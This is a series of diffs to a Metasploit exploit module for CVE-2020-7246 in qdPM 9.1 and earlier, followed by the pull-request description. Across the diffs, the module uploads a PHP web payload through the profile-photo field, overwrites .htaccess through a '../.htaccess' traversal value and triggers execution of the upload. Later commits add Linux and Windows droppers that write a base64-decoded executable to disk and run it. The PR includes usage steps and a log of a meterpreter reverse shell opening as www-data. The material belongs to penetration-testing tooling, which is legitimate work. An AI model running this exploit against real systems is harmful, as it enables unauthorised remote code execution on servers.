+    csrftoken_ = account_page.at("input[@name='users[_csrf_token]']/@value").text.strip
+    opts = {
+      'user_id' => userid,
+      'name' => username,
+      'csrf_token' => csrftoken_
+    }
+    return opts
+  end
+
+  def upload_php(base, opts)
+    fname = opts['filename']
+    php_payload = opts['data']
+    user_id = opts['user_id']
+    username = opts['username']
+    email = opts['email']
+    csrf_token = opts['csrf_token']
+
+    data = Rex::MIME::Message.new
+    data.add_part('put', nil, nil, 'form-data; name="sf_method"')
+    data.add_part(user_id, nil, nil, 'form-data; name="users[id]"')
+    data.add_part('', nil, nil, 'form-data; name="users[photo_preview]"')
+    data.add_part(csrf_token, nil, nil, 'form-data; name="users[_csrf_token]"')
+    data.add_part(username, nil, nil, 'form-data; name="users[name]"')
+    data.add_part('', nil, nil, 'form-data; name="users[new_password]"')
+    data.add_part(email, nil, nil, 'form-data; name="users[email]"')
+    data.add_part('', nil, nil, 'form-data; name="extra_fields[9]"')
+    data.add_part(php_payload, 'application/octet-stream', nil, "form-data; name=\"users[photo]\"; filename=\"#{fname}\"")
+
+    post_data = data.to_s
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri("#{base}index.php/myAccount/update"),
+      'ctype' => "multipart/form-data; boundary=#{data.bound}",
+      'data' => post_data,
+      'keep_cookies' => true,
+      'headers' => {
+        'Origin' => "http://#{rhost}",
+        'Referer' => "http://#{rhost}#{base}/index.php/home/myAccount"
+      }
+    })
+
+    if res.code == 302
+      return true
+    else
+      return false
+    end
+  end
+
+  def exec_php(base, _opts)
+    res = send_request_cgi({
+      'uri' => normalize_uri("#{base}/index.php/myAccount"),
+      'keep_cookies' => true
+    })
+    home_page = res.get_html_document
+    backdoor = home_page.at("//input[@name='users[photo_preview]']/@value")
+    @clean_file = backdoor
+    send_request_cgi({
+      'uri' => normalize_uri("#{base}/uploads/users/#{backdoor}")
+    })
+  end
+
+  def exploit
+    uri = normalize_uri(target_uri.path)
+    base = File.dirname("#{uri}.")
+
+    user = datastore['USERNAME']
+    pass = datastore['PASSWORD']
+    print_status("Attempt to login with '#{user}:#{pass}'")
+    opts = login(base, user, pass)
+    if opts.empty?
+      print_error('Login unsuccessful or bad (admin) user')
+      return
+    end
+
+    php_fname = "#{Rex::Text.rand_text_alpha(5)}.php"
+    p = get_write_exec_payload
+
+    print_status("Uploading PHP payload (#{p.length} bytes)...")
+    data = {
+      'username' => user.scan(/^(.+)@.+/).flatten[0] || '',
+      'email' => user.to_s,
+      'filename' => php_fname,
+      'data' => p
+    }
+    data = data.merge(opts)
+    uploader = upload_php(base, data)
+    if !uploader
+      print_error('Unable to upload')
+      return
+    end
+
+    print_status("Executing '#{php_fname}'")
+    exec_php(base, opts)
+  end
+end

--- a/modules/exploits/multi/http/qdpm_authenticated_rce.rb
+++ b/modules/exploits/multi/http/qdpm_authenticated_rce.rb
@@ -89,21 +89,6 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
-  def on_new_session(cli)
-    @clean_files.each do |clean_file|
-      print_warning("Removing: #{clean_file}")
-      begin
-        if cli.type == 'meterpreter'
-          cli.fs.file.rm(clean_file)
-        else
-          cli.shell_command_token("rm #{clean_file}")
-        end
-      rescue ::StandardError => e
-        print_error("Unable to remove #{clean_file}: #{e.message}")
-      end
-    end
-  end
-
   def get_write_exec_payload_win(fname, _data)
     p = Rex::Text.encode_base64(generate_payload_exe)
     php = %|
@@ -111,7 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote
     $f = fopen("#{fname}", "wb");
     fwrite($f, base64_decode("#{p}"));
     fclose($f);
-    exec("#{fname}");
+    exec("C:\\Windows\\System32\\cmd.exe /c #{fname}");
     ?>
     |
     php = php.gsub(/^ {4}/, '').gsub(/\n/, ' ')
@@ -143,6 +128,7 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi({
       'method' => 'GET',
       'uri' => normalize_uri("#{base}/index.php/myAccount"),
+      'keep_cookies' => true,
       'headers' => {
         'Host' => rhost.to_s
       }
@@ -246,12 +232,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'keep_cookies' => true
     })
     home_page = res.get_html_document
-    backdoor = home_page.at("//input[@name='users[photo_preview]']/@value")
-    if @clean_files
-      @clean_files << backdoor
-    else
-      @clean_files = [backdoor]
-    end
+    backdoor = home_page.at("//input[@name='users[photo_preview]']/@value").text.strip
+    register_file_for_cleanup(backdoor)
     send_request_cgi({
       'uri' => normalize_uri("#{base}/uploads/users/#{backdoor}")
     })
@@ -277,9 +259,8 @@ class MetasploitModule < Msf::Exploit::Remote
     when 'win'
       bin_name = "#{Rex::Text.rand_text_alpha(5)}.bin"
       bin = generate_payload_exe
-      @clean_files = ["C:\\Windows\\Temp\\#{bin_name}"]
-      p = get_write_exec_payload_win("C:\\Windows\\Temp\\#{bin_name}", bin)
-      print_warning("C:\\Windows\\Temp\\#{bin_name} will require manual cleanup")
+      p = get_write_exec_payload_win(bin_name.to_s, bin)
+      print_warning("#{bin_name} will require manual cleanup")
     end
 
     print_status("Uploading PHP payload (#{p.length} bytes)...")

--- a/modules/exploits/multi/http/qdpm_authenticated_rce.rb
+++ b/modules/exploits/multi/http/qdpm_authenticated_rce.rb
@@ -41,9 +41,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'Platform' => %w[linux php],
         'Targets' => [
-          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
-          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ],
-          [ 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ]
+          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ]
         ],
         'Privileged' => true,
         'DisclosureDate' => '2020-11-21',
@@ -73,11 +71,12 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_raw({ 'uri' => normalize_uri(base, '/index.php') })
     login_page = res.get_html_document
     begin
-      version = login_page.at('div[@class="copyright"]').at('a').text.tr('qdPM ', '').to_f
+      version_num = login_page.at('div[@class="copyright"]').at('a').text.tr('qdPM ', '').to_f
     rescue StandardError
       return Exploit::CheckCode::Unknown
     end
-    if version <= 9.1
+    version = Rex::Version.new(version_num)
+    if version <= Rex::Version.new('9.1')
       return Exploit::CheckCode::Appears
     else
       return Exploit::CheckCode::Safe
@@ -177,11 +176,7 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     })
 
-    if res.code == 302
-      return true
-    else
-      return false
-    end
+    return res.code == 302
   end
 
   def exec_php(base, _opts)

--- a/modules/exploits/multi/http/qdpm_authenticated_rce.rb
+++ b/modules/exploits/multi/http/qdpm_authenticated_rce.rb
@@ -31,7 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'References' => [
           ['CVE', '2020-7246'],
-          ['EDB', 'https://www.exploit-db.com/exploits/50175']
+          ['EDB', '50175']
         ],
         'Payload' => {
           'BadChars' => "\x00"
@@ -59,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('TARGETURI', [true, 'The base directory where qdPM resides', '/']),
-        OptString.new('USERNAME', [true, 'The username to login with']),
+        OptString.new('EMAIL', [true, 'The email to login with']),
         OptString.new('PASSWORD', [true, 'The password to login with'])
       ]
     )
@@ -201,7 +201,7 @@ class MetasploitModule < Msf::Exploit::Remote
     uri = normalize_uri(target_uri.path)
     base = File.dirname("#{uri}.")
 
-    user = datastore['USERNAME']
+    user = datastore['EMAIL']
     pass = datastore['PASSWORD']
     print_status("Attempt to login with '#{user}:#{pass}'")
     opts = login(base, user, pass)

--- a/modules/exploits/multi/http/qdpm_authenticated_rce.rb
+++ b/modules/exploits/multi/http/qdpm_authenticated_rce.rb
@@ -40,7 +40,11 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'Platform' => %w[linux php],
         'Targets' => [
-          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ]
+          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
+          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ],
+          [ 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ],
+          [ 'Windows x86', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ],
+          [ 'Windows x64', { 'Arch' => ARCH_X64, 'Platform' => 'win' } ]
         ],
         'Privileged' => true,
         'DisclosureDate' => '2020-11-21',
@@ -96,6 +100,35 @@ class MetasploitModule < Msf::Exploit::Remote
     rescue ::StandardError => e
       print_error("Unable to remove #{@clean_file}: #{e.message}")
     end
+  end
+
+  def get_write_exec_payload_linux(fname, _data)
+    p = Rex::Text.encode_base64(generate_payload_exe)
+    php = %|
+    <?php
+    $f = fopen("#{fname}", "wb");
+    fwrite($f, base64_decode("#{p}"));
+    fclose($f);
+    exec("chmod 777 #{fname}");
+    exec("#{fname}");
+    ?>
+    |
+    php = php.gsub(/^ {4}/, '').gsub(/\n/, ' ')
+    return php
+  end
+
+  def get_write_exec_payload_win(fname, _data)
+    p = Rex::Text.encode_base64(generate_payload_exe)
+    php = %|
+    <?php
+    $f = fopen("#{fname}", "wb");
+    fwrite($f, base64_decode("#{p}"));
+    fclose($f);
+    exec("#{fname}");
+    ?>
+    |
+    php = php.gsub(/^ {4}/, '').gsub(/\n/, ' ')
+    return php
   end
 
   # Login function
@@ -247,7 +280,19 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     php_fname = "#{Rex::Text.rand_text_alpha(5)}.php"
-    p = get_write_exec_payload
+    # p = get_write_exec_payload
+    case target['Platform']
+    when 'php'
+      p = get_write_exec_payload
+    when 'linux'
+      bin_name = "#{Rex::Text.rand_text_alpha(5)}.bin"
+      bin = generate_payload_exe
+      p = get_write_exec_payload_linux("/tmp/#{bin_name}", bin)
+    when 'win'
+      bin_name = "#{Rex::Text.rand_text_alpha(5)}.bin"
+      bin = generate_payload_exe
+      p = get_write_exec_payload_win("C:\\Windows\\Temp\\#{bin_name}", bin)
+    end
 
     print_status("Uploading PHP payload (#{p.length} bytes)...")
     data = {

--- a/modules/exploits/multi/http/qdpm_authenticated_rce.rb
+++ b/modules/exploits/multi/http/qdpm_authenticated_rce.rb
@@ -149,74 +149,68 @@ class MetasploitModule < Msf::Exploit::Remote
     email = opts['email']
     csrf_token = opts['csrf_token']
 
-    data = Rex::MIME::Message.new
-    data.add_part('put', nil, nil, 'form-data; name="sf_method"')
-    data.add_part(user_id, nil, nil, 'form-data; name="users[id]"')
-    data.add_part('.htaccess', nil, nil, 'form-data; name="users[photo_preview]"')
-    data.add_part(csrf_token, nil, nil, 'form-data; name="users[_csrf_token]"')
-    data.add_part(username, nil, nil, 'form-data; name="users[name]"')
-    data.add_part('', nil, nil, 'form-data; name="users[new_password]"')
-    data.add_part(email, nil, nil, 'form-data; name="users[email]"')
-    data.add_part('', nil, nil, 'form-data; name="extra_fields[9]"')
-    data.add_part('1', nil, nil, 'form-data; name="users[remove_photo]"')
+    data = [
+      { 'name' => 'sf_method', 'data' => 'put' },
+      { 'name' => 'users[id]', 'data' => user_id },
+      { 'name' => 'users[photo_preview]', 'data' => '.htaccess' },
+      { 'name' => 'users[_csrf_token]', 'data' => csrf_token },
+      { 'name' => 'users[name]', 'data' => username },
+      { 'name' => 'users[new_password]', 'data' => '' },
+      { 'name' => 'users[email]', 'data' => email },
+      { 'name' => 'extra_fields[9]', 'data' => '' },
+      { 'name' => 'users[remove_photo]', 'data' => '1' }
+    ]
 
-    post_data = data.to_s
-
-    send_request_cgi({
+    send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri("#{base}/index.php/myAccount/update"),
-      'ctype' => "multipart/form-data; boundary=#{data.bound}",
-      'data' => post_data,
+      'vars_form_data' => data,
       'keep_cookies' => true,
       'headers' => {
         'Origin' => "http://#{rhost}",
         'Referer' => "http://#{rhost}#{base}/index.php/home/myAccount"
       }
-    })
+    )
 
-    data = Rex::MIME::Message.new
-    data.add_part('put', nil, nil, 'form-data; name="sf_method"')
-    data.add_part(user_id, nil, nil, 'form-data; name="users[id]"')
-    data.add_part('../.htaccess', nil, nil, 'form-data; name="users[photo_preview]"')
-    data.add_part(csrf_token, nil, nil, 'form-data; name="users[_csrf_token]"')
-    data.add_part(username, nil, nil, 'form-data; name="users[name]"')
-    data.add_part('', nil, nil, 'form-data; name="users[new_password]"')
-    data.add_part(email, nil, nil, 'form-data; name="users[email]"')
-    data.add_part('', nil, nil, 'form-data; name="extra_fields[9]"')
-    data.add_part('1', nil, nil, 'form-data; name="users[remove_photo]"')
+    data = [
+      { 'name' => 'sf_method', 'data' => 'put' },
+      { 'name' => 'users[id]', 'data' => user_id },
+      { 'name' => 'users[photo_preview]', 'data' => '../.htaccess' },
+      { 'name' => 'users[_csrf_token]', 'data' => csrf_token },
+      { 'name' => 'users[name]', 'data' => username },
+      { 'name' => 'users[new_password]', 'data' => '' },
+      { 'name' => 'users[email]', 'data' => email },
+      { 'name' => 'extra_fields[9]', 'data' => '' },
+      { 'name' => 'users[remove_photo]', 'data' => '1' }
+    ]
 
-    post_data = data.to_s
-
-    send_request_cgi({
+    send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri("#{base}/index.php/myAccount/update"),
-      'ctype' => "multipart/form-data; boundary=#{data.bound}",
-      'data' => post_data,
+      'vars_form_data' => data,
       'keep_cookies' => true,
       'headers' => {
         'Origin' => "http://#{rhost}",
         'Referer' => "http://#{rhost}#{base}/index.php/home/myAccount"
       }
-    })
+    )
 
-    data = Rex::MIME::Message.new
-    data.add_part('put', nil, nil, 'form-data; name="sf_method"')
-    data.add_part(user_id, nil, nil, 'form-data; name="users[id]"')
-    data.add_part('', nil, nil, 'form-data; name="users[photo_preview]"')
-    data.add_part(csrf_token, nil, nil, 'form-data; name="users[_csrf_token]"')
-    data.add_part(username, nil, nil, 'form-data; name="users[name]"')
-    data.add_part('', nil, nil, 'form-data; name="users[new_password]"')
-    data.add_part(email, nil, nil, 'form-data; name="users[email]"')
-    data.add_part('', nil, nil, 'form-data; name="extra_fields[9]"')
-    data.add_part(php_payload, 'application/octet-stream', nil, "form-data; name=\"users[photo]\"; filename=\"#{fname}\"")
-
-    post_data = data.to_s
+    data = [
+      { 'name' => 'sf_method', 'data' => 'put' },
+      { 'name' => 'users[id]', 'data' => user_id },
+      { 'name' => 'users[_csrf_token]', 'data' => csrf_token },
+      { 'name' => 'users[name]', 'data' => username },
+      { 'name' => 'users[new_password]', 'data' => '' },
+      { 'name' => 'users[email]', 'data' => email },
+      { 'name' => 'extra_fields[9]', 'data' => '' },
+      { 'name' => 'users[remove_photo]', 'data' => '1' },
+      { 'name' => 'users[photo]', 'data' => php_payload, 'mime_type' => 'application/octet-stream', 'filename' => fname }
+    ]
 
     res = send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri("#{base}index.php/myAccount/update"),
-      'ctype' => "multipart/form-data; boundary=#{data.bound}",
-      'data' => post_data,
+      'vars_form_data' => data,
       'keep_cookies' => true,
       'headers' => {
         'Origin' => "http://#{rhost}",

--- a/modules/exploits/multi/http/qdpm_authenticated_rce.rb
+++ b/modules/exploits/multi/http/qdpm_authenticated_rce.rb
@@ -154,6 +154,56 @@ class MetasploitModule < Msf::Exploit::Remote
     data = Rex::MIME::Message.new
     data.add_part('put', nil, nil, 'form-data; name="sf_method"')
     data.add_part(user_id, nil, nil, 'form-data; name="users[id]"')
+    data.add_part('.htaccess', nil, nil, 'form-data; name="users[photo_preview]"')
+    data.add_part(csrf_token, nil, nil, 'form-data; name="users[_csrf_token]"')
+    data.add_part(username, nil, nil, 'form-data; name="users[name]"')
+    data.add_part('', nil, nil, 'form-data; name="users[new_password]"')
+    data.add_part(email, nil, nil, 'form-data; name="users[email]"')
+    data.add_part('', nil, nil, 'form-data; name="extra_fields[9]"')
+    data.add_part('1', nil, nil, 'form-data; name="users[remove_photo]"')
+
+    post_data = data.to_s
+
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri("#{base}/index.php/myAccount/update"),
+      'ctype' => "multipart/form-data; boundary=#{data.bound}",
+      'data' => post_data,
+      'keep_cookies' => true,
+      'headers' => {
+        'Origin' => "http://#{rhost}",
+        'Referer' => "http://#{rhost}#{base}/index.php/home/myAccount"
+      }
+    })
+
+    data = Rex::MIME::Message.new
+    data.add_part('put', nil, nil, 'form-data; name="sf_method"')
+    data.add_part(user_id, nil, nil, 'form-data; name="users[id]"')
+    data.add_part('../.htaccess', nil, nil, 'form-data; name="users[photo_preview]"')
+    data.add_part(csrf_token, nil, nil, 'form-data; name="users[_csrf_token]"')
+    data.add_part(username, nil, nil, 'form-data; name="users[name]"')
+    data.add_part('', nil, nil, 'form-data; name="users[new_password]"')
+    data.add_part(email, nil, nil, 'form-data; name="users[email]"')
+    data.add_part('', nil, nil, 'form-data; name="extra_fields[9]"')
+    data.add_part('1', nil, nil, 'form-data; name="users[remove_photo]"')
+
+    post_data = data.to_s
+
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri("#{base}/index.php/myAccount/update"),
+      'ctype' => "multipart/form-data; boundary=#{data.bound}",
+      'data' => post_data,
+      'keep_cookies' => true,
+      'headers' => {
+        'Origin' => "http://#{rhost}",
+        'Referer' => "http://#{rhost}#{base}/index.php/home/myAccount"
+      }
+    })
+
+    data = Rex::MIME::Message.new
+    data.add_part('put', nil, nil, 'form-data; name="sf_method"')
+    data.add_part(user_id, nil, nil, 'form-data; name="users[id]"')
     data.add_part('', nil, nil, 'form-data; name="users[photo_preview]"')
     data.add_part(csrf_token, nil, nil, 'form-data; name="users[_csrf_token]"')
     data.add_part(username, nil, nil, 'form-data; name="users[name]"')

--- a/modules/exploits/multi/http/qdpm_authenticated_rce.rb
+++ b/modules/exploits/multi/http/qdpm_authenticated_rce.rb
@@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::EXE
   include Msf::Exploit::PhpEXE
+  include Msf::Exploit::FileDropper
 
   def initialize(info = {})
     super(
@@ -64,9 +65,12 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    uri = normalize_uri(target_uri.path)
-    base = File.dirname("#{uri}.")
-    res = send_request_raw({ 'uri' => normalize_uri(base, '/index.php') })
+    uri = normalize_uri(uri, '/index.php')
+    res = send_request_raw({ 'uri' => uri })
+    if res.nil?
+      return Exploit::CheckCode::Unknown
+    end
+
     login_page = res.get_html_document
     begin
       version_num = login_page.at('div[@class="copyright"]').at('a').text.tr('qdPM ', '').to_f
@@ -119,7 +123,7 @@ class MetasploitModule < Msf::Exploit::Remote
     })
     res = send_request_cgi({
       'method' => 'GET',
-      'uri' => "#{base}index.php/myAccount",
+      'uri' => normalize_uri("#{base}/index.php/myAccount"),
       'headers' => {
         'Host' => rhost.to_s
       }
@@ -145,7 +149,6 @@ class MetasploitModule < Msf::Exploit::Remote
     fname = opts['filename']
     php_payload = opts['data']
     user_id = opts['user_id']
-    username = opts['username']
     email = opts['email']
     csrf_token = opts['csrf_token']
 
@@ -154,7 +157,6 @@ class MetasploitModule < Msf::Exploit::Remote
       { 'name' => 'users[id]', 'data' => user_id },
       { 'name' => 'users[photo_preview]', 'data' => '.htaccess' },
       { 'name' => 'users[_csrf_token]', 'data' => csrf_token },
-      { 'name' => 'users[name]', 'data' => username },
       { 'name' => 'users[new_password]', 'data' => '' },
       { 'name' => 'users[email]', 'data' => email },
       { 'name' => 'extra_fields[9]', 'data' => '' },
@@ -177,7 +179,6 @@ class MetasploitModule < Msf::Exploit::Remote
       { 'name' => 'users[id]', 'data' => user_id },
       { 'name' => 'users[photo_preview]', 'data' => '../.htaccess' },
       { 'name' => 'users[_csrf_token]', 'data' => csrf_token },
-      { 'name' => 'users[name]', 'data' => username },
       { 'name' => 'users[new_password]', 'data' => '' },
       { 'name' => 'users[email]', 'data' => email },
       { 'name' => 'extra_fields[9]', 'data' => '' },
@@ -199,7 +200,6 @@ class MetasploitModule < Msf::Exploit::Remote
       { 'name' => 'sf_method', 'data' => 'put' },
       { 'name' => 'users[id]', 'data' => user_id },
       { 'name' => 'users[_csrf_token]', 'data' => csrf_token },
-      { 'name' => 'users[name]', 'data' => username },
       { 'name' => 'users[new_password]', 'data' => '' },
       { 'name' => 'users[email]', 'data' => email },
       { 'name' => 'extra_fields[9]', 'data' => '' },
@@ -209,7 +209,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     res = send_request_cgi({
       'method' => 'POST',
-      'uri' => normalize_uri("#{base}index.php/myAccount/update"),
+      'uri' => normalize_uri("#{base}/index.php/myAccount/update"),
       'vars_form_data' => data,
       'keep_cookies' => true,
       'headers' => {
@@ -229,6 +229,7 @@ class MetasploitModule < Msf::Exploit::Remote
     home_page = res.get_html_document
     backdoor = home_page.at("//input[@name='users[photo_preview]']/@value")
     @clean_file = backdoor
+    register_files_for_cleanup(@clean_file)
     send_request_cgi({
       'uri' => normalize_uri("#{base}/uploads/users/#{backdoor}")
     })
@@ -236,12 +237,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     uri = normalize_uri(target_uri.path)
-    base = File.dirname("#{uri}.")
-
     user = datastore['EMAIL']
     pass = datastore['PASSWORD']
     print_status("Attempt to login with '#{user}:#{pass}'")
-    opts = login(base, user, pass)
+    opts = login(uri, user, pass)
     if opts.empty?
       print_error('Login unsuccessful or bad (admin) user')
       return
@@ -252,19 +251,18 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status("Uploading PHP payload (#{p.length} bytes)...")
     data = {
-      'username' => user.scan(/^(.+)@.+/).flatten[0] || '',
       'email' => user.to_s,
       'filename' => php_fname,
       'data' => p
     }
     data = data.merge(opts)
-    uploader = upload_php(base, data)
+    uploader = upload_php(uri, data)
     if !uploader
       print_error('Unable to upload')
       return
     end
 
     print_status("Executing '#{php_fname}'")
-    exec_php(base, opts)
+    exec_php(uri, opts)
   end
 end


### PR DESCRIPTION
Implemented CVE-2020-7246, a Remote Code Execution vulnerability present in qdPM 9.1 and lower. RCE is obtained by authenticated arbitrary file upload. When updating a user's profile, qdPM fails to validate the content of the `users[photo]` field. This allows for the upload of a PHP file which can be navigated to to obtain command execution.
The vulnerability is the same as CVE-2015-3884, only this requires authentication. 

## Verification

Tested on qdPM 9.1

- [ ] Start `msfconsole`
- [ ] `use exploit/multi/http/qdpm_authenticated_rce`
- [ ] `set USERNAME <username>`
- [ ]  `set PASSWORD <password>`
- [ ]  `set TARGETURI <target_uri>`
- [ ]  `set RHOST <rhost>`
- [ ]  `set RPORT <rport>`
- [ ]  `exploit`
- [ ] Verify that a new session is created.

A copy of the vulnerable software can be found, for testing,  at https://www.exploit-db.com/exploits/50944

## Scenarios

```
[msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> exploit

[*] Started reverse TCP handler on 192.168.2.177:4444
[*] Attempt to login with 'fake@local.com:nah'
[*] Uploading PHP payload (1940 bytes)...
[*] Executing 'ZAQse.php'
[*] Sending stage (989032 bytes) to 192.168.2.177
[!] Removing: 266340-ZAQse.php
[*] Meterpreter session 18 opened (192.168.2.177:4444 -> 192.168.2.177:43532) at 2022-06-13 18:26:38 +0200

(Meterpreter 18)(/home/giacomo/qdPM/uploads/users) > getuid
Server username: www-data
```

## Known limitations
- No Windows-specific targets
- Large payloads may fail to upload.

## Note
The CVE description on NVD (https://nvd.nist.gov/vuln/detail/CVE-2020-7246) and the PoC on ExploitDB refer to a path traversal vulnerability that allows to bypass restriction imposed by `.htaccess`. However, throughout my testing, that did not seem to be a necessity, and uploading a PHP script as "photo" was always enough to achieve RCE. If while testing someone runs into troubles, I would be happy to add the remaining code from the PoC. If not however, I thought it best to avoid as many unnecessary requests as possible. 
